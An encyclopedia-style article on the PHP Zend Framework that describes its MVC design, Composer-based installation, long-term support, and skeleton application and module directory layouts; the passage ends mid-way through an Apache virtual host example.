so happy I get to be a SharePoint MVP for another year ! 
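The "Update system properties" entry above breaks off mid-snippet. A completed version might look like the following; this is a sketch only, assuming a WSS 3.0/MOSS 2007 farm and a reference to Microsoft.SharePoint.dll, with the site URL, list name and account as placeholders:

```csharp
// Sketch only: URL, list name and account are placeholders, not from the post.
using System;
using Microsoft.SharePoint;

class UpdateSystemProperties
{
    static void Main()
    {
        using (SPSite site = new SPSite("http://server"))
        using (SPWeb web = site.OpenWeb())
        {
            SPList list = web.Lists["Documents"];
            SPListItem item = list.Items[0];

            SPUser user = web.EnsureUser(@"DOMAIN\user");
            SPFieldUserValue userValue = new SPFieldUserValue(web, user.ID, user.Name);

            // Per the post: "Created By" only sticks when "Modified By" is
            // written as well (to a new value or simply its current one).
            item["Created By"] = userValue;
            item["Modified By"] = userValue;
            item["Created"] = new DateTime(2009, 1, 1);
            item["Modified"] = new DateTime(2009, 1, 1);

            item.UpdateOverwriteVersion(); // write without creating a new version
        }
    }
}
```

Note the workaround the post describes: both person fields are written together, and UpdateOverwriteVersion keeps the change from bumping the version on a versioned library.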
The email arrived only two hours ago and I really wasn't convinced of my renewal, but nevertheless it is a fact. Also congrats to all the other guys and gals that have gotten their renewal!! Steven
- … Computed Field (Steven Van de Craen, 2009-03-31; tags: Field Types, Advanced Computed Field): Introduction: This project originally started as 'TitleLinkField' because I needed a way to display the Title field as a hyperlink to the document in a document library, but it ended up being more than just that, so I chose a more generic name for it. I had some experience with Custom Field Type…
- … custom document properties on a file share (Steven Van de Craen, 2009-01-08): A file share with Word and Excel documents (.doc, .docx, .xls, .xlsx) having custom document properties is indexed via MOSS 2007 or MSS 2008. When the crawl has finished, the custom properties are listed in 'Crawled properties', but the details view mentions "There are zero documents in the in…
- … 2007: December Update (Steven Van de Craen, 2008-12-29; tags: …Services, Forms Server, SharePoint, SharePoint Updates): This update really combines all previous updates, so installation order is simplified: WSS SP1 (+ for all language packs), MOSS SP1 (+ for all language packs), WSS December Update: x86 / x64 (separate downloads!), MOSS December Update: x86 / x64 (separate downloads!). More info about that here…
- … permissions: 'Only their own' (Steven Van de Craen, 2008-12-19): The title of this blog post is referring to this screen in the List Settings. It interests me because it allows you to control ownership of the item, is only available to Lists but not to Document Libraries, and doesn't use unique permissions but some other mechanism. One thing it mentions is th…
- … 2007 Event Receiver and Enterprise Library: TargetInvocationException (Steven Van de Craen, 2008-12-15; tags: …Receivers): Today I got into some code reviewing of an Item Event Receiver using Enterprise Library for data access. The problem occurred when registering the Event Receiver for a SharePoint List using the object model (SPList.EventReceivers.Add): "Exception has been thrown by the target of an invocation." Here…
- … a new security group to an Audience (Steven Van de Craen, 2008-12-11): I had a new Active Directory security group created a few days ago, but it still wasn't showing up in the Audience management pages when I tried to create a rule "User member of AD group". After double-checking my group settings I couldn't find anything out of the ordinary, and my MOSS 2007 server had …
- … permissions for 'Save list as template' (Steven Van de Craen, 2008-12-09): Consider the following scenario: a MOSS 2007 Portal where everyone has read permissions, but some 'content owners' have elevated permissions on libraries and lists and want to save a list as template (.stp). In this case they need to have elevated access to the List Template Catalog (http://…
- … and jQuery coolness (Steven Van de Craen, 2008-11-27): Yes I know, you already have it first-hand from Jan's blog but still... How cool is that teaser?
- …: Sharing data over applications? (Steven Van de Craen, 2008-11-12): Introduction…
- … 2007 and ZIP indexing (Steven Van de Craen, 2008-11-10): Introduction: Here's a post about indexing ZIP archives in the same style as the one I did on PDF indexing. The search engine makes use of IFilters to be able to read the specific structure of a certain file type and retrieve information from it that it puts in an index. When you perform a search qu…
- … Update, August Update, October Update, Service Pack 2 (Steven Van de Craen, 2008-10-30; tags: …Updates, Excel Services, Forms Server): Update (December Update): The December Update was released recently and is a real cumulative update which simplifies installation quite a bit. Read more about it here: SharePoint 2007 - December Update. It's hard to keep up with the updates for SharePoint these day…
- … Server: userName() function and Forms Based Authentication (Steven Van de Craen, 2008-10-20; tags: …Server, SharePoint): So you have an InfoPath 2007 form that renders as a Web page and you use the userName() function to get the current user. This works fine when you're using Windows Authentication but stays empty when you're using Forms Based Authentication!! Also note that for Windows Authentication it doesn't ret…
- … Server: XmlFormView and setting the InitialView on load (Steven Van de Craen, 2008-10-10; tags: …Server, SharePoint): I have been struggling with this for too long and the result is still not quite satisfying, but it'll have to do for now. I have a Web Control that renders an InfoPath form using the Microsoft.Office.InfoPath.Server.Controls.XmlFormView control and want the form to open with a specific View rather t…
- … decompressing data from a cabinet file (Steven Van de Craen, 2008-10-07): Introduction: A SharePoint 2007 site with configured lists, content types, web parts, data, etc. is saved into a template (.STP) for future creation of sites. However, you receive the error "Failure decompressing data from a cabinet file". In one of our customer cases the culprit here were t…
- … without hardcoding the modifications (Steven Van de Craen, 2008-10-03): Description: Not sure if this has been done or not, but it seems illogical to have the web.config modifications hard-coded into the Feature Receiver, so I whipped up a quick mechanism to read them from an external config XML file. Feel free to use and improve as desired. The code uses LINQ to XML for r…
- … Automation: extract embedded Word Documents (Steven Van de Craen, 2008-09-18): I'm normally not into Office Automation, but today I needed to extract all embedded files from a Word Document. Those files were Word, Excel and PDF documents. Luckily the majority were Word documents, because the quick solution I whipped up only works for those types, not for Excel or PDF. Here's t…
- … a list based on a multivalue column and filter (Steven Van de Craen, 2008-09-17): Today I got into testing how to filter a list with a multivalued Choice (or Lookup) column based on a multivalued filter. The setup I'm using is to connect a Choice Filter Web Part with the List View Web Part. Once you have configured the Filter Web Part and connected it to the List View Web Part …
- … and restore Site Collections between localized SharePoint installations (Steven Van de Craen, 2008-08-21): Question. Pop quiz: I have a Dutch installation of SharePoint (WSS 3.0 or MOSS 2007) that already contains a lot of data. I want to restore the main site collection on a different server with an English installation of SharePoint. Can it be done? Considerations: Take into account that a localized v…
- …: TODAY + 1 hour formula? (Steven Van de Craen, 2008-08-19): I clicked together an easy custom announcements list with Begin and End Date and wanted for each new item the following default values: Begin Date = TODAY, End Date = TODAY + 1 hour. Setting the Begin Date is easy, but I scratched my head a few times for the End Date. I found the following info…
- … what's new? (Steven Van de Craen, 2008-07-22): I've been out of the game for somewhat a month now and it seems I've been missing quite a bit. I'm not going to make another announcement about the Infrastructure Update (oops... I think I just did) because it has already been widely blogged in the community. Can't wait to run it on some of ou…
- … Action Button (Steven Van de Craen, 2008-06-20; tags: Field Types): Introduction: Don't you just miss the possibility to have buttons on a SharePoint List or Library View similar to an ASP.NET GridView? You could add Edit or Delete functionality or even cooler things such as navigating to a LAYOUTS page rather than having to use the item context menu drop-down: …
- … Hyperlink fields in SharePoint 2007 (Steven Van de Craen, 2008-06-04): Description: Here's a small solution for those of you lucky enough to have MOSS 2007. It will not work if you only have WSS 3.0 installed. This project will add a browse button to all Link fields in your SharePoint Lists by using the AssetUrlSelector control. For more information about this see: …
- … with the AssetUrlSelector (Steven Van de Craen, 2008-06-04): I'm doing some tests with the AssetUrlSelector control to improve user experience in a SharePoint 2007 environment. The AssetUrlSelector control gives your end users a nice interface for selecting a link or image URL from a site collection. You can read the MSDN documentation here: AssetUrlSel…
- … -o export: FatalError: Failed to compare two elements in the array (Steven Van de Craen, 2008-04-28): Community Update: It's nice to see the community providing feedback on my tools and improving them. I strongly encourage this, and here's another example of this kind of interaction. Achim Ismaili has improved the FaultyFeatureTool and added it to CodePlex: …
- … and Equipment Reservations v2 (UNOFFICIAL) (Steven Van de Craen, 2008-04-21): Introduction: Microsoft released the Fabulous 40 Application Templates for SharePoint 2007 a (long) while ago. One of them is Rooms and Equipment Reservations (link), where you can make bookings for conference rooms, material, etc. and get a visual overview of all bookings. Issues: If you really star…
- … a SharePoint MVP... (Steven Van de Craen, 2008-04-17): This post says it all: … Hope to be there next MVP Summit :)
- … MVP on the block (Steven Van de Craen, 2008-04-02): Yesterday I got notice about being awarded MVP for SharePoint Server! At first I figured it to be an April Fool's joke, but no such thing :) I'm really loving this!!!
- … MySite Blogs (Steven Van de Craen, 2008-03-28): Introduction: I was recently tasked with writing a handler to display the combined RSS feed of all MySite blogs on a SharePoint Intranet. The handler takes into account the current user permissions (no rights to see the blog or post means you don't see it in the feed). Deployment: Add the SharePoint…
- … and asynchronous Event Handlers (Steven Van de Craen, 2008-03-21): In SharePoint 2007 it is possible to handle events that occur on list items. These types of events come in two flavours: synchronous and asynchronous.
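The "… and asynchronous Event Handlers" entry above distinguishes the two flavours. A minimal receiver showing both might look like this; it is a sketch only, assuming Microsoft.SharePoint.dll, with the "Protected" column, the message text and the class name made up for illustration:

```csharp
// Sketch only: the "Protected" column and messages are hypothetical.
using Microsoft.SharePoint;

public class FlavourDemoReceiver : SPItemEventReceiver
{
    // Synchronous ("-ing") event: fires before the change is committed,
    // so it can still cancel the operation and surface an error message.
    public override void ItemDeleting(SPItemEventProperties properties)
    {
        object flag = properties.ListItem["Protected"];
        if (flag != null && (bool)flag)
        {
            properties.Cancel = true;
            properties.ErrorMessage = "This item may not be deleted.";
        }
    }

    // Asynchronous ("-ed") event: fires after the change; cancelling is no
    // longer possible, but the item can still be post-processed.
    public override void ItemAdded(SPItemEventProperties properties)
    {
        SPListItem item = properties.ListItem;
        item["Title"] = "[new] " + item["Title"];
        item.SystemUpdate(false); // persist without creating a new version
    }
}
```

The naming convention carries the distinction: "-ing" receivers can set Cancel and ErrorMessage, "-ed" receivers cannot.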
Synchronous: happens 'before' the actual event; you have the HttpContext and you can show an error message in the browser and cancel the ev…
- … 2.0 Final Release (Steven Van de Craen, 2008-03-14): CKS:EBE 2.0 has been released since a few days! Check it out here: …
- … 2008 wrap up (Steven Van de Craen, 2008-03-13): Today was the last day of TechDays 2008 and it was nice to see all those familiar faces again. The group of people you meet at such events just increases every year; I wonder what it would be like 20 or 30 years from now... I didn't sit through many SharePoint sessions but decided to go broader …
- … Activation Dependency + Hidden = Automagic (Steven Van de Craen, 2008-02-23): In SharePoint 2007 you can make Features dependent on each other so that FeatureB can only be activated if FeatureA is. If this isn't the case it will prompt you with a message to activate FeatureA first. Now, when you mark FeatureA as HIDDEN the Feature Dependency will automagically activate i…
- … Errors: 6482, 7888, 6398 and 7076 (Steven Van de Craen, 2008-02-23): Problem: I was receiving multiple complaints from clients with the above errors in the machine's Event Log: "Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt." Besides the errors it …
- … node in new Content Type XML (Steven Van de Craen, 2008-02-23): If you declare your Site Columns and Content Types in XML to deploy them as a Site Collection Feature, you must make sure to ALWAYS include the <FieldRefs> node. If you leave it out, your Content Type will not have any of the inherited fields of the parent Content Type!!! <ContentTyp…
- … 2008 (Steven Van de Craen, 2008-01-30): Thought I'd promote the upcoming TechDays 2008 event (previously the Developer & IT Pro Days) in Ghent. Three days packed with loads of presentations about upcoming technologies and releases. Find out about the program, speakers and more on the following site: …
- …: Selected node CSS bug (Steven Van de Craen, 2008-01-24): I may have found a bug in the SPTreeView control. When you select a node, the CSS class declared in the SelectedNodeStyle isn't applied to the node. Other than that it seems to behave correctly. Sample markup (in a LAYOUTS page): <wssuc:InputFormControl…
- … in XP: Cannot add this hardware (Steven Van de Craen, 2008-01-19): I had an issue for some time now where I could not add new USB Plug & Play devices (memory sticks, hard drives, cameras, etc). Devices that were added before the problem occurred still functioned properly; just the new ones wouldn't install. I tried changing stuff in the registry (values…
- … start workflow (Steven Van de Craen, 2008-01-18): Programmatically starting a workflow requires the following code: Guid wfBaseId = new Guid("{6BE0ED92-BB12-4F8F-9687-E12DC927E4AD}"); SPSite site = ...; SPWeb web = site.OpenWeb(); SPList list = web.Lists["listname"]; SPListItem item = list.Items[0]; SPWorkflowAs…
- … Indicator not working on client (Steven Van de Craen, 2008-01-17): If the Online Presence Indicator is not working properly on some clients, it could be that the IE plugin is corrupted. Client has Office 2003: try reinstalling the Office Web Components. Client has Office 2007: try the following: close all IE windows, rename the file C:\Program Files\Microso…
- …: FullTextQuery RowLimit (Steven Van de Craen, 2008-01-14): When you query the SharePoint Search Service the number of rows returned defaults to 100 but can be increased as required. Note that when you specify a value above the maximum RowLimit the query will only return the default value of 100 items! ServerContext ctx = ServerContext.Defaul…
- … updated with CKS:EBE (Steven Van de Craen, 2007-12-27): …late…
- …: Text Property Builder in a custom ToolPane/EditorPart (Steven Van de Craen, 2007-12-27): Introduction: By default, text properties in the Web Part Property pane can be filled in using a Property Builder as shown below. This only applies to the default SharePoint ToolPanes (or EditorParts, as they're called in the new terminology). If you develop a custom ToolPane or EditorPart with …
- … Services Trusted Locations and Alternate Access Mappings (Steven Van de Craen, 2007-12-20; tags: …Services): Yesterday I discovered that Excel Services' Trusted Locations don't use the Alternate Access Mappings collection from MOSS 2007 to grant or deny access to a workbook inside a SharePoint Document Library. I did a search on the Web and apparently it is already a known issue: Excel Services will …
- … a SharePoint Workflow (Steven Van de Craen, 2007-12-20): Terminating the workflow will set its status to Canceled and will delete all tasks created by the workflow. Via browser interface: … Via code: // Cancel SPWorkflowManager.CancelWorkflow(workflowProperties.Workflow); Applies to: Windows SharePoint Services 3.0 (+ Service Pack 1), Microsoft Office Share…
- … Framework 2.0 and 3.0 Service Pack 1 (Steven Van de Craen, 2007-12-15): I just noticed that Service Pack 1 for .NET Framework 2.0 and 3.0 has been released. I missed it completely due to the large number of announcements regarding Office 2007 Service Pack 1. .NET FX 2.0 SP1 redist x86, .NET FX 2.0 SP1 redist x64, .NET FX 3.0 SP1 redist x86, .NET FX 3.0 SP1 redist x64. Th…
- … Part Gallery: Change Web Part metadata tool (Steven Van de Craen, 2007-12-10): Using the Web Part Gallery you can easily add new Web Parts to a Site Collection, and it will even generate the .webpart or .dwp XML file for you. Just drop the assembly in the BIN or GAC, add a correct <SafeControl> node in the web.config and you should see your Web Part(s) in the New dialog …
- …: Some things worth mentioning (Steven Van de Craen, 2007-12-06): There are some things you need to know as a SharePoint developer... Creating a list: When you create a list using the browser you get to specify the name for the list. Basically this means both the URL part and the title. Not all characters are allowed in a URL, so SharePoint will just filter them ou…
- … Columns in CAML: No option to modify values? (Steven Van de Craen, 2007-12-06): One of our projects is being automated using solution files and Features. When the Site Collection Feature is activated it automatically creates Site Columns, Site Content Types and a Document Library using both of the aforementioned. Currently the entire process is via Object Model code. However, …
- … Part Properties and the Event Life Cycle (Steven Van de Craen, 2007-11-30): Something I noticed during Web Part development was that the Web Part Properties were not loaded at constructor call time.
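The "… start workflow" entry above (2008-01-18) breaks off at "SPWorkflowAs…". A completed version might look like the following; this is a sketch only, reusing the GUID and list name from the excerpt (the site URL is a placeholder) and assuming the list actually carries a workflow association for that base template:

```csharp
// Sketch only: completes the truncated snippet; requires Microsoft.SharePoint.dll.
using System;
using Microsoft.SharePoint;
using Microsoft.SharePoint.Workflow;

class StartWorkflowDemo
{
    static void Main()
    {
        Guid wfBaseId = new Guid("{6BE0ED92-BB12-4F8F-9687-E12DC927E4AD}");

        using (SPSite site = new SPSite("http://server")) // placeholder URL
        using (SPWeb web = site.OpenWeb())
        {
            SPList list = web.Lists["listname"];
            SPListItem item = list.Items[0];

            // Resolve the association on the list by its base template id...
            SPWorkflowAssociation assoc =
                list.WorkflowAssociations.GetAssociationByBaseID(wfBaseId);

            // ...and start a new workflow instance on the item.
            site.WorkflowManager.StartWorkflow(item, assoc, assoc.AssociationData);
        }
    }
}
```

The counterpart appears in the "Terminating a SharePoint Workflow" entry: SPWorkflowManager.CancelWorkflow stops a running instance.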
Makes sense, since the control has to be instantiated before the properties can be loaded, but I recently forgot and it had me troubled for a while. Q. So when are the Web Part P…
- … Server 2008: installation gimmick (Steven Van de Craen, 2007-11-30): I just installed the Release Candidate of Microsoft Search Server 2008 Express edition. Although the documentation mentioned a Basic and Advanced installation, I didn't get that option. Another thing I noticed: SharePoint is everywhere :)
- …: Immediate alert notifications stopped working (Steven Van de Craen, 2007-11-23): One of our MOSS servers was not sending out any alert notifications anymore. I'm not sure when it stopped working, but recently users started complaining about it. When I subscribe to a new alert I still get the 'New alert' notification, but that's actually a different mechanism than the actual aler…
- … Search: Basic Authentication issues (Steven Van de Craen, 2007-11-22): One of our MOSS 2007 servers has a single Web Application (no extended Web Apps) and is configured to use Basic Authentication. I have confirmed that my dedicated crawl account has sufficient permissions in the Policy for Web Application section of Central Administration > Application management…
- … Exception: Maximum retry on the connection exceeded (Steven Van de Craen, 2007-11-22; tags: NAV, SOAP): Setup. C/AL // Create SOAP mes…
- … 2007 and PDF indexing (Steven Van de Craen, 2007-11-21): Introduction: By default the SharePoint 2007 Search indexes only the metadata of a PDF document. By installing and configuring a PDF IFilter, the Search will also index the contents of the PDF document. This allows users to find documents based on text inside the document. This process is called ful…
- … Ed 2007: Day 5 (Steven Van de Craen, 2007-11-12): Time sure flies when you're having fun. It has been an exciting week with a lot of interesting sessions, which I have blogged about the last couple of days. Following now will be a variety of workshops for my colleagues at home about the new things we picked up here. The flight back was at 5:30 …
- … Ed 2007: Day 4 (Steven Van de Craen, 2007-11-08): My head feels as if I had single-handedly emptied the Sal Cafe's wine cellar... But other than the after-effects I'm currently experiencing, I had a great time at the Tech Ed Country Drink for Belgians and Luxembourgers. Workflow in Microsoft SharePoint Products and Technologies 2007: This session on …
- … Ed 2007: Day 3 (Steven Van de Craen, 2007-11-07): Develop a Community Solution with VSTO 3.0, Office Open XML and WSS 3.0: Mario Szpuszta builds a restaurant rating web solution from scratch. Restaurant owners can submit their restaurant details in the form of a Word 2007 document containing Content Controls mapped to a custom XML part. A custom …
- … 2007: Exception when handling a document renaming event (Steven Van de Craen, 2007-11-07): Situation: I have written a small Event Handler to automatically copy the file name and version to custom text fields in order to be able to use them in Microsoft Word (ItemAdded, ItemCheckedOut, ItemUpdated). Here's a small sample of the code I'm using: public override void ItemUpdated(SPItemE…
- … Ed 2007: Day 2 (Steven Van de Craen, 2007-11-06): I didn't get a lot of sleep last night because here in Spain they tend to have dinner really late in the evening.
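The "Exception when handling a document renaming event" entry above cuts off at "public override void ItemUpdated(SPItemE…". A receiver along the lines it describes might look like this; it is a sketch only, with the two text column names made up, and it assumes the receiver is bound to a document library (so ListItem.File is not null):

```csharp
// Sketch only: "FileNameText" and "VersionText" are hypothetical columns.
using Microsoft.SharePoint;

public class FileNameVersionReceiver : SPItemEventReceiver
{
    public override void ItemUpdated(SPItemEventProperties properties)
    {
        SPListItem item = properties.ListItem;

        DisableEventFiring(); // keep our own update from re-triggering ItemUpdated
        try
        {
            item["FileNameText"] = item.File.Name;
            item["VersionText"] = item.File.UIVersionLabel;
            item.SystemUpdate(false); // persist without creating a new version
        }
        finally
        {
            EnableEventFiring();
        }
    }
}
```

Disabling event firing around the write-back is the usual guard against the receiver recursing into itself.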
.NET Developers Advanced Introduction to SharePoint 2007: Ted Pattison delivered an excellent session for .NET developers, explaining in detail some of the aspects and pitfalls…
- … Ed 2007: Day 1 (Steven Van de Craen, 2007-11-06): The first day of Tech Ed 2007 started very early for my flight from Brussels to Barcelona, followed by a brief check-in at the hotel. This was my first year of Tech Ed and it was amazing to see how massive this event really is. Keynote: S. Somasegar provided the keynote with some interesting upcomin…
- … Kit For SharePoint: Beta 2 (Steven Van de Craen, 2007-10-16): If you're wondering why my RSS feed was acting funny today: my blog was updated to CKS:EBE 2.0 Beta 2. There were no issues installing this release, but I still needed to update my theme files (master page, XSL) because of all the new stuff in Beta 2. I immediately fixed some minor bugs where …
- … by FeedBurner (Steven Van de Craen, 2007-10-12): From now on I'm syndicated by FeedBurner: …
- … Forms Services problem with anonymous submitted forms using administrator-approved form templates (Steven Van de Craen, 2007-10-12): Introduction: We have designed an InfoPath 2007 Form that can be filled in from the browser using InfoPath Forms Services (using MOSS 2007). The MOSS 2007 Enterprise environment has an NTLM authenticated Web Application (…) and an anonymous extended Web Application (…
- … Explorer crash when opening a MS Office document on SharePoint (Steven Van de Craen, 2007-10-12): Issue: You click on a Microsoft Office document inside a SharePoint Document Library and the browser crashes. Event Type: Error, Event Source: Application Error, Event Category: None, Event ID: 1000, Date: 10/08/2007, Time: 14:47:01, User: N/A, Computer: PC001, Descr…
- … Method (Steven Van de Craen, 2007-09-24): A post about the ReplaceLink method of a Microsoft.SharePoint.SPListItem object. This method replaces all instances of a given absolute URL with a new absolute URL inside a SharePoint List Item. Remarks: Only applies to URLs formatted as hyperlink (Rich Text Field) or inside Hyperlin…
- …: 25 September 2007 (Steven Van de Craen, 2007-09-12): 18:00 – 18:30 Registration and Welcome; 18:30 – 20:15 Session 1: Guidelines and Best Practices for a Successful SharePoint Deployment within Your Organization. Join this session if you are looking for answers to questions like 'When is it appropr…
- … Kit for SharePoint (Steven Van de Craen, 2007-09-10): In case you were wondering what I've been up to lately: I have joined the Community Kit for SharePoint team to work on the Enhanced Blog Edition (EBE). This amazing project really extends some of the basic SharePoint 2007 functionality such as Intranet/Extranet deployments, blogging, wik…
- … 2007: People Search Options shown by default (repost) (Steven Van de Craen, 2007-08-28): Instructions: Go to the People Search Page in your SharePoint Portal and modify the page (e.g. /SearchCenter/Pages/people.aspx). Add a Content Editor Web Part right below the People Search Box Web Part. Add the following javascript to the CEWP: <script type="text/javascript">var a…
- … 1.1 CTP released (Steven Van de Craen, 2007-08-21): Via Microsoft SharePoint Products and Technologies Team Blog: What's New in VSeWSS 1.1? WSP View, aka "Solution Package editing"; new Item Templates: "List Instance" project item, "List Event Handler" project item, "_layout file" project item; Fas…
- …, Antivirus and Alert Notification (Steven Van de Craen, 2007-08-21): Problem: You receive a notification about an alert being created for a SharePoint List, but receive no actual alerts after that. Cause: Alerts not being received can be caused by so many things, but one of the possible causes is your antivirus software on the SharePoint Server. Our antivirus softw…
- … Server 2005: Importing from Excel error (repost) (Steven Van de Craen, 2007-08-14): Something weird that occurred today: I had an Excel file that I needed to import into my SQL Server 2005 database. I followed the instructions but kept getting an error. Problem: Error 0xc020901c: Data Flow Task: There was an error with output column "Agenda 2" (63) on output …
- … (Steven Van de Craen, 2007-08-13): Description: By default, when you upload multiple files they are stored as the default 'Document' Content Type. Since I had a lot of templates to upload (over and over again) I created this tool to ease the pain. It's a Windows application that can upload multiple files directly as a specified Conte…
- … and Site Templates (repost) (Steven Van de Craen, 2007-07-24): By default your SharePoint pages are ghosted, which means the layout template is stored on the web front-end server's file system, while the content is stored in SQL Server. Once you make modifications to a page using SharePoint Designer 2007 the page becomes unghosted; both layout and content ar…
- … to connect publishing custom string handler for output caching (repost) (Steven Van de Craen, 2007-07-24): Issue: This had me troubled for quite a while, and looking on the Internet didn't really give any real solutions (here and here).
In my case the errors were caused by a custom Web Service that I added to SharePoint. When one of the Web Parts called the Web Service, an event log entry was written: …
- … characters in Site URL (repost) (Steven Van de Craen, 2007-07-24): General: When creating sites through the SharePoint Object Model, the Web Services or the Web Interface, you need to filter the illegal characters when specifying the Site Name (which is the part of the URL that references your site). Here's a list of common illegal characters: # % & * { …
- … WebPart Life Cycle reminder (repost) (Steven Van de Craen, 2007-07-24): I'm currently programming some connectable Web Parts for MOSS 2007 and want to make this a small note to self. Web Part life cycle on page load: OnInit, OnLoad, Connection Consuming, CreateChildControls, OnPreRender, Render (RenderContents, etc). Web Part life cycle on button click: OnInit, CreateChi…
- … 2007 Content Control mapping tool (repost) (Steven Van de Craen, 2007-07-24): Here's a really handy tool for mapping your custom XML to Content Controls inside the Word document. …
- … 2007 and SQL Server collation: Latin1_General_CI_AS_KS_WS (repost) (Steven Van de Craen, 2007-07-24): Make sure the SQL Server collation for your SharePoint 2007 databases is set to Latin1_General_CI_AS_KS_WS: case insensitive, accent sensitive, kana sensitive, width sensitive. This was implemented because this collation most resembles NTFS file name restrictions.
- … Belux article: Customizing the Content Query Web Part (repost) (Steven Van de Craen, 2007-07-24): My first article on MSDN Belux: … It was written for MOSS 2007 Beta 2 but still very much applies to MOSS 2007 RTM.
- … (Steven Van de Craen, 2007-07-24): Description: A SharePoint Library event handler to automatically link a picture to a MOSS 2007 User Profile. The file names must be of the following format: [accountName].[ext]. ItemAdded: the event handler extracts the account name from the new file; the Profile Picture URL property of the c…
- … (Steven Van de Craen, 2007-07-24): Description: A tool for registering/unregistering Event Handlers from a SharePoint List or Library. It uses an XML file to register event handlers: <definitions> <definition assembly="ProfilePictureEventHandler, Version=1.0.0.0, Culture=neutral, PublicKeyToken=4…
- … create site using custom site definition error (Steven Van de Craen, 2007-07-23): A while ago I blogged about creating a custom site definition for WSS 3.0/MOSS 2007. The problem I experienced today was with a WSS 3.0 installation and creating sites programmatically. Say I have copied the STS Site Definition and made some changes so only the 'blank' template remains. I ad…
- … Studio 2005 Extensions for Windows SharePoint Services 3.0 (Steven Van de Craen, 2007-07-23): They have been available for quite a while now: … I have just started experimenting with them and they do have some specific oddities: "Object reference not set to…
- … Query and "Attempted to perform an unauthorized operation" (Steven Van de Craen, 2007-07-23): When I was trying some of the SharePoint 2007 (both MOSS 2007 and WSS 3.0) Search Query tools available (MOSS Query Tool, Search Query Web Service Test Tool) I kept getting the following error: System.Web.Services.Protocols.SoapException: Server was unable to process request. --…
- … and try/catch (Steven Van de Craen, 2007-07-23): When doing some SharePoint manipulations using the Object Model you will likely have an instance of an SPWeb object. When you try to update an item or list located in the SPWeb instance, or update the instance itself, you will most likely set the AllowUnsafeUpdates property to true before calling the …
- … 2007: Login failed for user 'DOMAIN\user' periodically (per minute) (Steven Van de Craen, 2007-07-23): Issue: One of our SharePoint installations suffered a crash, so we recreated the farm and restored a content backup. The search indexes and user profiles were rebuilt/imported. Since the crash we noticed a lot of 'Login failed' messages in the SQL Server machine's event log. These events o…
- … 3.0 Event Handler: pre-event cancelling issues (Steven Van de Craen, 2007-07-20): I'm currently implementing an Event Handler for a Picture Library (a project I will blog about in the near future) and have learned the hard way about handling event handlers... The issue I am experiencing applies to WSS 3.0 (and MOSS 2007) and seems to be about the pre-event event types. Th…
- … 2003 Web Parts and Office 2007 clients (Steven Van de Craen, 2007-07-20): The Office 2003 Web Parts can still be installed on WSS 3.0 and MOSS 2007.
STSADM.EXE -o addwppack -filename "Microsoft.Office.DataParts.cab" -globalinstall For your clients to see the Web Parts correctly rendered they will need the Office 2003 client libraries and Internet E... (More)<img src="" height="1" width="1" alt=""/> Van de Craen2007-07-18T08:50:00-07:00Description A default List View Web Part allows most types of columns to be filtered by a user. Unfortunately it is not possible to filter on eg. the name of a file in a document library. The FilteredViewWebPart allows to dynamically specify an additional filter before retrieving ite... (More)<img src="" height="1" width="1" alt=""/> Van de Craen2007-07-18T08:45:00-07:00Description A default Content Query Web Part has an item limit that just retrieves the first X items. For displaying it allows to group these items based on a property (Created Date, Author, Site, ...). The GroupByItemLimitWebPart allows to specify an item limit per group (when grouping is enabled... (More)<img src="" height="1" width="1" alt=""/> | http://feeds.feedburner.com/vandest | CC-MAIN-2018-30 | en | refinedweb |
Zend Framework (ZF) is an open source, object-oriented web application framework implemented in PHP 7 and licensed under the New BSD License.[3] The framework is basically a collection of professional PHP-based[4] packages.[5] The framework manages its packages using Composer as its package dependency manager, with PHPUnit used for testing all packages and Travis CI[6] for continuous integration services. Zend Framework provides support for the Model-View-Controller (MVC) pattern[7] in combination with a Front Controller solution.[8] The MVC implementation in Zend Framework has five main areas. The router[9] and dispatcher decide which controller to run based on data from the URL, and the controller works in combination with the model and view to develop and create the final web page.[5][10] ZF2 and later is CLA-free.[11] Long-term support (LTS) is also available for the framework for a total duration of 3 years. To opt in, one needs to modify the Composer requirement for Zend Framework:[12]
$ composer require "zendframework/zendframework:~2.4.0"
This will result in a modification of the composer.json file and will pin the semantic version to ~2.4.0, which ensures you get updates specifically from the 2.4 series. If users want to use a different LTS series, they need to specify the corresponding X.Y version.
Starting with Zend Framework version 2.5, components are split into independently versioned packages and zendframework/zendframework is converted into a Composer meta-package. Framework components introduced after the split are not added to the meta-package.
While the zendframework/zendframework meta-package release version remains at 3.0.0, it instructs Composer to install the latest compatible versions of the framework components, per semantic versioning. For example, the zend-mvc component will be installed at its current version 3.1.1, zend-servicemanager at version 3.3.0 and zend-form at version 2.10.2.
Zend Framework includes the following components:[13]
The officially supported install method is via the Composer package manager.
Zend Framework provides a meta-package that includes 61 components, but the recommended way is to install the required framework components individually. Composer will resolve and install all additional dependencies.
For instance, if you need the MVC package, you can install it with the following command:
$ composer require zendframework/zend-mvc
A full list of components is available in the Zend Framework documentation.[13]
Zend Framework follows a configuration-over-convention approach and does not impose any particular application structure. Skeleton applications for zend-mvc and zend-expressive are available; they provide everything necessary to run applications and serve as a good starting point.
ZendSkeletonApplication, a skeleton application using the Zend Framework MVC layer and module systems, can be installed with:
$ composer create-project zendframework/skeleton-application <project-path>
It will create a file structure similar to this:
<project name>/
+-- config/
|   +-- autoload/
|   |   +-- global.php
|   |   +-- local.php.dist
|   +-- application.config.php
|   +-- modules.config.php
+-- data/
|   +-- cache/
+-- module/
+-- public/
|   +-- index.php
+-- vendor/
+-- composer.json
+-- composer.lock
+-- phpunit.xml.dist
The config/ directory has application-wide configurations. The module/ directory contains local modules that are committed along with the application. The vendor/ directory contains vendor code and other modules managed independently from the application; the content of this folder is normally managed by Composer.
A Zend Framework module has only one requirement: a Module class exists in the module namespace and is autoloadable. The Module class provides configuration and initialization logic to the application. The recommended module structure is as follows:
<modulename>
+-- config/
|   +-- module.config.php
+-- src/
|   +-- Module.php
+-- test/
+-- view/
+-- composer.json
+-- phpunit.xml.dist
The config/ directory holds module configs, the src/ directory contains module source code as defined in the PSR-4 autoloading standard, the test/ directory contains unit tests for the module, and the view/ directory holds view scripts.
Zend Framework supports creating the structure of directories from the command line. We will use the command-line interface to start creating the directory structure for our project; this will give you a complete structural understanding of the directories. The interface provides the Zend_Tool interface, giving a whole host of command functionalities.
This procedure will create a Zend Framework project in a location you specify. After running Zend_Tool, it will create the basic application skeleton.[14] This will create not only the directory structure but also all the basic elements of the MVC framework.[14] To get Apache working, the virtual host settings will be as follows:[14]
Listen 8080
<VirtualHost *:8080>
    DocumentRoot /User/keithpope/Sites/hellozend/public
